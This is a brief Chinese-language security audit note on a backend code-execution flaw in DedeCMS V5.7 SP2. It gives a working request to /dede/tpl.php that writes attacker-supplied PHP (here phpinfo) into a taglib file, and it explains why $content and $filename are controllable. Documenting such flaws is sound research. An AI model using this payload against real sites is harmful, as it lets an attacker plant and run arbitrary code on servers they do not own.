审计对象:DedeCMS V5.7 SP2
dedecms官网:http://www.dedecms.com/
参考文章:DedeCMS V5.7 SP2后台存在代码执行漏洞
payload:/dede/tpl.php?action=savetagfile&filename=mochazz.lib.php&content=<?php phpinfo();?>&token=[你的token值]
漏洞文件发生在/dede/tpl.php中,程序直接将经过stripslashes()
处理的$content
写入/include/taglib/xxx.lib.php文件。由于dedecms全局变量注册的特性,所以这里的$content
变和$filename
可控。